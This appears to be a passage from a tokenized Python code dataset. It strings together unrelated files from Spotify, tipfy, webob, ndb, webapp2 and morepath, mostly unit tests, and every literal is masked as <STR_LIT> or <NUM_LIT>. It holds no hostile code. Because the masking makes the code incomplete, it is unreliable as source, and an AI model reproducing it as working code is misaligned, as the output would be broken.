IndexError ) as ctx : <EOL> tracks [ <NUM_LIT:1> ] <EOL> self . assertEqual ( str ( ctx . exception ) , '<STR_LIT>' ) <EOL> def test_getitem_raises_type_error_on_non_integral_index ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> with self . 
assertRaises ( TypeError ) : <EOL> tracks [ '<STR_LIT:abc>' ] <EOL> def test_repr ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> self . assertEqual ( repr ( tracks ) , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> lib_path = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> if lib_path not in sys . path : <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ <EOL> lib_path , <EOL> os . path . join ( lib_path , '<STR_LIT>' ) , <EOL> os . path . join ( lib_path , '<STR_LIT>' ) , <EOL> ] <EOL> from tipfy . app import App <EOL> from config import config <EOL> from urls import rules <EOL> def enable_appstats ( app ) : <EOL> """<STR_LIT>""" <EOL> from google . appengine . ext . appstats . recording import appstats_wsgi_middleware <EOL> app . dispatch = appstats_wsgi_middleware ( app . dispatch ) <EOL> def enable_jinja2_debugging ( ) : <EOL> """<STR_LIT>""" <EOL> if not debug : <EOL> return <EOL> from google . appengine . tools . dev_appserver import HardenedModulesHook <EOL> HardenedModulesHook . _WHITE_LIST_C_MODULES += [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> debug = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> app = App ( rules = rules , config = config , debug = debug ) <EOL> enable_appstats ( app ) <EOL> enable_jinja2_debugging ( ) <EOL> def main ( ) : <EOL> app . run ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import time <EOL> import unittest <EOL> from tipfy import Tipfy , Request , Response <EOL> from tipfy . sessions import SessionStore , SecureCookieStore , SecureCookieSession <EOL> import test_utils <EOL> class TestSecureCookie ( test_utils . BaseTestCase ) : <EOL> def _get_app ( self ) : <EOL> return Tipfy ( config = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } ) <EOL> def test_get_cookie_no_cookie ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_invalid_parts ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_invalid_signature ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_expired ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' , max_age = - <NUM_LIT> ) , None ) <EOL> def test_get_cookie_badly_encoded ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> timestamp = str ( int ( time . time ( ) ) ) <EOL> value = '<STR_LIT:foo>' <EOL> signature = store . _get_signature ( '<STR_LIT>' , value , timestamp ) <EOL> cookie_value = '<STR_LIT:|>' . join ( [ value , timestamp , signature ] ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' % cookie_value ) ] ) <EOL> self . assertEqual ( store . 
get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_valid ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test_utils . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import mimetypes <EOL> import os <EOL> import sys <EOL> import zipfile <EOL> from tipfy . template import Loader , ZipLoader <EOL> _LOADER = None <EOL> TEMPLATE_PATH = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> ZIP_PATH = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_loader ( ) : <EOL> global _LOADER <EOL> if _LOADER is None : <EOL> if os . path . exists ( TEMPLATE_PATH ) : <EOL> _LOADER = Loader ( TEMPLATE_PATH ) <EOL> elif os . path . exists ( ZIP_PATH ) : <EOL> _LOADER = ZipLoader ( ZIP_PATH , '<STR_LIT>' ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( TEMPLATE_PATH , ZIP_PATH ) ) <EOL> return _LOADER <EOL> def get_template ( filename ) : <EOL> """<STR_LIT>""" <EOL> return get_loader ( ) . load ( filename ) <EOL> def render_template ( filename , ** context ) : <EOL> """<STR_LIT>""" <EOL> return get_template ( filename ) . generate ( ** context ) <EOL> sys . modules [ '<STR_LIT>' ] = sys . modules [ __name__ ] <EOL> from werkzeug . wrappers import BaseResponse as Response <EOL> from werkzeug . debug . console import HTMLStringO <EOL> from werkzeug import DebuggedApplication as DebuggedApplicationBase <EOL> class DebuggedApplication ( DebuggedApplicationBase ) : <EOL> def get_resource ( self , request , filename ) : <EOL> """<STR_LIT>""" <EOL> response = super ( DebuggedApplication , self ) . get_resource ( request , <EOL> filename ) <EOL> if response . status_code != <NUM_LIT> or not os . path . exists ( ZIP_PATH ) : <EOL> return response <EOL> filepath = os . path . join ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , filename ) <EOL> mimetype = mimetypes . guess_type ( filename ) [ <NUM_LIT:0> ] or '<STR_LIT>' <EOL> f = zipfile . ZipFile ( ZIP_PATH , '<STR_LIT:r>' ) <EOL> try : <EOL> response = Response ( f . read ( filepath ) , mimetype = mimetype ) <EOL> return response <EOL> except Exception : <EOL> pass <EOL> finally : <EOL> f . 
close ( ) <EOL> return Response ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> def seek ( self , n , mode = <NUM_LIT:0> ) : <EOL> pass <EOL> def readline ( self ) : <EOL> if len ( self . _buffer ) == <NUM_LIT:0> : <EOL> return '<STR_LIT>' <EOL> ret = self . _buffer [ <NUM_LIT:0> ] <EOL> del self . _buffer [ <NUM_LIT:0> ] <EOL> return ret <EOL> HTMLStringO . seek = seek <EOL> HTMLStringO . readline = readline </s>
<s> from lib2to3 import fixer_base <EOL> from lib2to3 . fixer_util import Name , BlankLine <EOL> class FixXrange2 ( fixer_base . BaseFix ) : <EOL> PATTERN = "<STR_LIT>" <EOL> def transform ( self , node , results ) : <EOL> node . replace ( Name ( '<STR_LIT>' , prefix = node . prefix ) ) </s>
<s> from mako import runtime , filters , cache <EOL> UNDEFINED = runtime . UNDEFINED <EOL> __M_dict_builtin = dict <EOL> __M_locals_builtin = locals <EOL> _magic_number = <NUM_LIT:5> <EOL> _modified_time = <NUM_LIT> <EOL> _template_filename = '<STR_LIT>' <EOL> _template_uri = '<STR_LIT>' <EOL> _template_cache = cache . Cache ( __name__ , _modified_time ) <EOL> _source_encoding = None <EOL> _exports = [ ] <EOL> def render_body ( context , ** pageargs ) : <EOL> context . caller_stack . _push_frame ( ) <EOL> try : <EOL> __M_locals = __M_dict_builtin ( pageargs = pageargs ) <EOL> __M_writer = context . writer ( ) <EOL> __M_writer ( u'<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> finally : <EOL> context . caller_stack . _pop_frame ( ) </s>
<s> from nose . tools import eq_ <EOL> from nose . tools import raises <EOL> import unittest <EOL> def test_cache_control_object_max_age_None ( ) : <EOL> from webob . cachecontrol import CacheControl <EOL> cc = CacheControl ( { } , '<STR_LIT:a>' ) <EOL> cc . properties [ '<STR_LIT>' ] = None <EOL> eq_ ( cc . max_age , - <NUM_LIT:1> ) <EOL> class TestUpdateDict ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . call_queue = [ ] <EOL> def callback ( args ) : <EOL> self . call_queue . append ( "<STR_LIT>" % repr ( args ) ) <EOL> self . callback = callback <EOL> def make_one ( self , callback ) : <EOL> from webob . cachecontrol import UpdateDict <EOL> ud = UpdateDict ( ) <EOL> ud . updated = callback <EOL> return ud <EOL> def test_clear ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert len ( newone ) == <NUM_LIT:1> <EOL> newone . clear ( ) <EOL> assert len ( newone ) == <NUM_LIT:0> <EOL> def test_update ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> d = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> newone . update ( d ) <EOL> assert newone == d <EOL> def test_set_delete ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert len ( self . call_queue ) == <NUM_LIT:1> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == "<STR_LIT>" <EOL> del newone [ '<STR_LIT>' ] <EOL> assert len ( self . call_queue ) == <NUM_LIT:2> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == '<STR_LIT>' <EOL> def test_setdefault ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> assert newone . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert len ( self . call_queue ) == <NUM_LIT:1> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == "<STR_LIT>" , self . call_queue [ - <NUM_LIT:1> ] <EOL> assert newone . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert len ( self . 
call_queue ) == <NUM_LIT:1> <EOL> def test_pop ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> newone . pop ( '<STR_LIT>' ) <EOL> assert len ( self . call_queue ) == <NUM_LIT:2> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == '<STR_LIT>' , self . call_queue [ - <NUM_LIT:1> ] <EOL> def test_popitem ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert newone . popitem ( ) == ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> assert len ( self . call_queue ) == <NUM_LIT:2> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == '<STR_LIT>' , self . call_queue [ - <NUM_LIT:1> ] <EOL> def test_callback_args ( self ) : <EOL> assert True <EOL> class TestExistProp ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> pass <EOL> def make_one ( self ) : <EOL> from webob . cachecontrol import exists_property <EOL> class Dummy ( object ) : <EOL> properties = dict ( prop = <NUM_LIT:1> ) <EOL> type = '<STR_LIT>' <EOL> prop = exists_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> badprop = exists_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return Dummy <EOL> def test_get_on_class ( self ) : <EOL> from webob . cachecontrol import exists_property <EOL> Dummy = self . make_one ( ) <EOL> assert isinstance ( Dummy . prop , exists_property ) , Dummy . prop <EOL> def test_get_on_instance ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> assert obj . prop is True <EOL> @ raises ( AttributeError ) <EOL> def test_type_mismatch_raise ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> obj . badprop = True <EOL> def test_set_w_value ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> obj . prop = True <EOL> assert obj . prop is True <EOL> assert obj . properties [ '<STR_LIT>' ] is None <EOL> def test_del_value ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> del obj . prop <EOL> assert not '<STR_LIT>' in obj . 
properties <EOL> class TestValueProp ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> pass <EOL> def make_one ( self ) : <EOL> from webob . cachecontrol import value_property <EOL> class Dummy ( object ) : <EOL> properties = dict ( prop = <NUM_LIT:1> ) <EOL> type = '<STR_LIT>' <EOL> prop = value_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> badprop = value_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return Dummy <EOL> def test_get_on_class ( self ) : <EOL> from webob . cachecontrol import value_property <EOL> Dummy = self . make_one ( ) <EOL> assert isinstance ( Dummy . prop , value_property ) , Dummy . prop <EOL> def test_get_on_instance ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> assert dummy . prop , dummy . prop <EOL> def test_set_on_instance ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = "<STR_LIT>" <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> assert dummy . properties [ '<STR_LIT>' ] == "<STR_LIT>" , dict ( dummy . properties ) <EOL> def test_set_on_instance_bad_attribute ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = "<STR_LIT>" <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> assert dummy . properties [ '<STR_LIT>' ] == "<STR_LIT>" , dict ( dummy . properties ) <EOL> def test_set_wrong_type ( self ) : <EOL> from webob . cachecontrol import value_property <EOL> class Dummy ( object ) : <EOL> properties = dict ( prop = <NUM_LIT:1> , type = '<STR_LIT>' ) <EOL> type = '<STR_LIT>' <EOL> prop = value_property ( '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT>' ) <EOL> dummy = Dummy ( ) <EOL> def assign ( ) : <EOL> dummy . prop = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , assign ) <EOL> def test_set_type_true ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = True <EOL> self . assertEquals ( dummy . prop , None ) <EOL> def test_set_on_instance_w_default ( self ) : <EOL> dummy = self . 
make_one ( ) ( ) <EOL> dummy . prop = "<STR_LIT>" <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> def test_del ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = '<STR_LIT>' <EOL> del dummy . prop <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> def test_copy_cc ( ) : <EOL> from webob . cachecontrol import CacheControl <EOL> cc = CacheControl ( { '<STR_LIT>' : '<STR_LIT:%>' , "<STR_LIT>" : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> cc2 = cc . copy ( ) <EOL> assert cc . properties is not cc2 . properties <EOL> assert cc . type is cc2 . type <EOL> def test_serialize_cache_control_emptydict ( ) : <EOL> from webob . cachecontrol import serialize_cache_control <EOL> result = serialize_cache_control ( dict ( ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_cache_control_object ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_object_with_headers ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { '<STR_LIT>' : '<STR_LIT:a>' } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_value_is_None ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { '<STR_LIT>' : None } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_value_needs_quote ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> class TestCacheControl ( unittest . TestCase ) : <EOL> def make_one ( self , props , typ ) : <EOL> from webob . 
cachecontrol import CacheControl <EOL> return CacheControl ( props , typ ) <EOL> def test_ctor ( self ) : <EOL> cc = self . make_one ( { '<STR_LIT:a>' : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> self . assertEquals ( cc . properties , { '<STR_LIT:a>' : <NUM_LIT:1> } ) <EOL> self . assertEquals ( cc . type , '<STR_LIT>' ) <EOL> def test_parse ( self ) : <EOL> from webob . cachecontrol import CacheControl <EOL> cc = CacheControl . parse ( "<STR_LIT>" ) <EOL> self . assertEquals ( type ( cc ) , CacheControl ) <EOL> self . assertEquals ( cc . max_age , <NUM_LIT> ) <EOL> self . assertEquals ( cc . public , True ) <EOL> def test_parse_updates_to ( self ) : <EOL> from webob . cachecontrol import CacheControl <EOL> def foo ( arg ) : return { '<STR_LIT:a>' : <NUM_LIT:1> } <EOL> cc = CacheControl . parse ( "<STR_LIT>" , updates_to = foo ) <EOL> self . assertEquals ( type ( cc ) , CacheControl ) <EOL> self . assertEquals ( cc . max_age , <NUM_LIT> ) <EOL> def test_parse_valueerror_int ( self ) : <EOL> from webob . cachecontrol import CacheControl <EOL> def foo ( arg ) : return { '<STR_LIT:a>' : <NUM_LIT:1> } <EOL> cc = CacheControl . parse ( "<STR_LIT>" ) <EOL> self . assertEquals ( type ( cc ) , CacheControl ) <EOL> self . assertEquals ( cc . max_age , '<STR_LIT:abc>' ) <EOL> def test_repr ( self ) : <EOL> cc = self . make_one ( { '<STR_LIT:a>' : '<STR_LIT:1>' } , '<STR_LIT>' ) <EOL> result = repr ( cc ) <EOL> self . assertEqual ( result , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import sys <EOL> import threading <EOL> import time <EOL> from google . appengine . api import memcache <EOL> from google . appengine . ext import webapp <EOL> from ndb import context , model , tasklets <EOL> @ tasklets . tasklet <EOL> def fibonacci ( n ) : <EOL> """<STR_LIT>""" <EOL> if n <= <NUM_LIT:1> : <EOL> raise tasklets . Return ( n ) <EOL> a , b = yield fibonacci ( n - <NUM_LIT:1> ) , fibonacci ( n - <NUM_LIT:2> ) <EOL> raise tasklets . Return ( a + b ) <EOL> class FibonacciMemo ( model . Model ) : <EOL> arg = model . IntegerProperty ( ) <EOL> value = model . IntegerProperty ( ) <EOL> @ tasklets . tasklet <EOL> def memoizing_fibonacci ( n ) : <EOL> """<STR_LIT>""" <EOL> if n <= <NUM_LIT:1> : <EOL> raise tasklets . Return ( n ) <EOL> key = model . Key ( FibonacciMemo , str ( n ) ) <EOL> memo = yield key . get_async ( ndb_should_cache = False ) <EOL> if memo is not None : <EOL> assert memo . arg == n <EOL> logging . info ( '<STR_LIT>' , n , memo . value ) <EOL> raise tasklets . Return ( memo . value ) <EOL> logging . info ( '<STR_LIT>' , n ) <EOL> a = yield memoizing_fibonacci ( n - <NUM_LIT:1> ) <EOL> b = yield memoizing_fibonacci ( n - <NUM_LIT:2> ) <EOL> ans = a + b <EOL> memo = FibonacciMemo ( key = key , arg = n , value = ans ) <EOL> logging . info ( '<STR_LIT>' , n , memo . value ) <EOL> yield memo . put_async ( ndb_should_cache = False ) <EOL> raise tasklets . Return ( ans ) <EOL> TRUE_VALUES = frozenset ( [ '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:t>' , '<STR_LIT:true>' , '<STR_LIT:y>' , '<STR_LIT:yes>' ] ) <EOL> class FiboHandler ( webapp . RequestHandler ) : <EOL> @ context . toplevel <EOL> def get ( self ) : <EOL> num = <NUM_LIT:10> <EOL> try : <EOL> num = int ( self . request . get ( '<STR_LIT>' ) ) <EOL> except Exception : <EOL> pass <EOL> if self . request . get ( '<STR_LIT>' ) in TRUE_VALUES : <EOL> logging . info ( '<STR_LIT>' ) <EOL> yield model . delete_multi_async ( x . 
key for x in FibonacciMemo . query ( ) ) <EOL> t0 = time . time ( ) <EOL> if self . request . get ( '<STR_LIT>' ) in TRUE_VALUES : <EOL> memo_type = '<STR_LIT>' <EOL> ans = yield memoizing_fibonacci ( num ) <EOL> else : <EOL> memo_type = '<STR_LIT>' <EOL> ans = yield fibonacci ( num ) <EOL> t1 = time . time ( ) <EOL> self . response . out . write ( '<STR_LIT>' % <EOL> ( memo_type , num , ans , t1 - t0 ) ) <EOL> urls = [ <EOL> ( '<STR_LIT>' , FiboHandler ) , <EOL> ] <EOL> app = webapp . WSGIApplication ( urls ) </s>
<s> from distutils . cmd import Command <EOL> import doctest <EOL> from glob import glob <EOL> import os <EOL> import sys <EOL> TOOLS_DIR = os . path . dirname ( __file__ ) <EOL> class build_doc ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ <EOL> ( '<STR_LIT>' , None , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , None , <EOL> "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def initialize_options ( self ) : <EOL> self . force = False <EOL> self . without_apidocs = False <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> from docutils . core import publish_cmdline <EOL> from docutils . nodes import raw <EOL> from docutils . parsers import rst <EOL> from genshi . input import HTMLParser <EOL> from genshi . template import TemplateLoader <EOL> docutils_conf = os . path . join ( TOOLS_DIR , '<STR_LIT>' , '<STR_LIT>' ) <EOL> epydoc_conf = os . path . join ( TOOLS_DIR , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> from pygments import highlight <EOL> from pygments . lexers import get_lexer_by_name <EOL> from pygments . formatters import HtmlFormatter <EOL> def code_block ( name , arguments , options , content , lineno , <EOL> content_offset , block_text , state , state_machine ) : <EOL> lexer = get_lexer_by_name ( arguments [ <NUM_LIT:0> ] ) <EOL> html = highlight ( '<STR_LIT:\n>' . join ( content ) , lexer , HtmlFormatter ( ) ) <EOL> return [ raw ( '<STR_LIT>' , html , format = '<STR_LIT:html>' ) ] <EOL> code_block . arguments = ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> code_block . options = { '<STR_LIT>' : rst . directives . unchanged } <EOL> code_block . content = <NUM_LIT:1> <EOL> rst . directives . register_directive ( '<STR_LIT>' , code_block ) <EOL> except ImportError : <EOL> print ( '<STR_LIT>' ) <EOL> loader = TemplateLoader ( [ '<STR_LIT>' , '<STR_LIT>' ] , variable_lookup = '<STR_LIT:strict>' ) <EOL> for source in glob ( '<STR_LIT>' ) : <EOL> dest = os . path . 
splitext ( source ) [ <NUM_LIT:0> ] + '<STR_LIT>' <EOL> if self . force or not os . path . exists ( dest ) or os . path . getmtime ( dest ) < os . path . getmtime ( source ) : <EOL> print ( '<STR_LIT>' % dest ) <EOL> publish_cmdline ( writer_name = '<STR_LIT:html>' , <EOL> argv = [ '<STR_LIT>' % docutils_conf , source , <EOL> dest ] ) <EOL> fileobj = open ( dest ) <EOL> try : <EOL> html = HTMLParser ( fileobj , encoding = '<STR_LIT:utf-8>' ) <EOL> template = loader . load ( '<STR_LIT>' ) <EOL> output = template . generate ( <EOL> html = html , <EOL> project = self . distribution <EOL> ) . render ( '<STR_LIT:html>' , encoding = '<STR_LIT:utf-8>' ) <EOL> finally : <EOL> fileobj . close ( ) <EOL> fileobj = open ( dest , '<STR_LIT:w>' ) <EOL> try : <EOL> fileobj . write ( output ) <EOL> finally : <EOL> fileobj . close ( ) <EOL> if not self . without_apidocs : <EOL> try : <EOL> from epydoc import cli <EOL> old_argv = sys . argv [ <NUM_LIT:1> : ] <EOL> sys . argv [ <NUM_LIT:1> : ] = [ <EOL> '<STR_LIT>' % epydoc_conf , <EOL> '<STR_LIT>' % self . distribution . packages [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] + self . distribution . packages <EOL> cli . cli ( ) <EOL> sys . argv [ <NUM_LIT:1> : ] = old_argv <EOL> except ImportError : <EOL> print ( '<STR_LIT>' ) <EOL> class test_doc ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> for filename in glob ( '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % filename ) <EOL> doctest . testfile ( filename , False , optionflags = doctest . ELLIPSIS ) </s>
<s> import webapp2 <EOL> class LazyHandler ( webapp2 . RequestHandler ) : <EOL> def get ( self , ** kwargs ) : <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> class CustomMethodHandler ( webapp2 . RequestHandler ) : <EOL> def custom_method ( self ) : <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> def handle_exception ( request , response , exception ) : <EOL> return webapp2 . Response ( body = '<STR_LIT>' ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> namespace_packages = [ '<STR_LIT>' ] , <EOL> packages = find_packages ( ) , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> import morepath <EOL> class app ( morepath . App ) : <EOL> pass <EOL> @ app . path ( path = '<STR_LIT:/>' ) <EOL> class Root ( object ) : <EOL> pass <EOL> @ app . path ( path = '<STR_LIT:/>' , model = Root ) <EOL> def get_root ( ) : <EOL> return Root ( ) </s>
<s> import morepath <EOL> from webtest import TestApp as Client <EOL> from morepath . error import LinkError , ConflictError <EOL> import pytest <EOL> def setup_module ( module ) : <EOL> morepath . disable_implicit ( ) <EOL> def test_defer_links ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( ) ) <EOL> @ Root . view ( model = RootModel , name = '<STR_LIT>' ) <EOL> def root_model_class_link ( self , request ) : <EOL> return request . class_link ( SubModel ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> with pytest . raises ( LinkError ) : <EOL> c . get ( '<STR_LIT>' ) <EOL> def test_defer_view ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . view ( SubModel ( ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Sub . json ( model = SubModel ) <EOL> def submodel_default ( self , request ) : <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . 
defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> def test_defer_view_predicates ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . view ( SubModel ( ) , name = '<STR_LIT>' ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Sub . json ( model = SubModel , name = '<STR_LIT>' ) <EOL> def submodel_edit ( self , request ) : <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ Root . mount ( app = Sub , 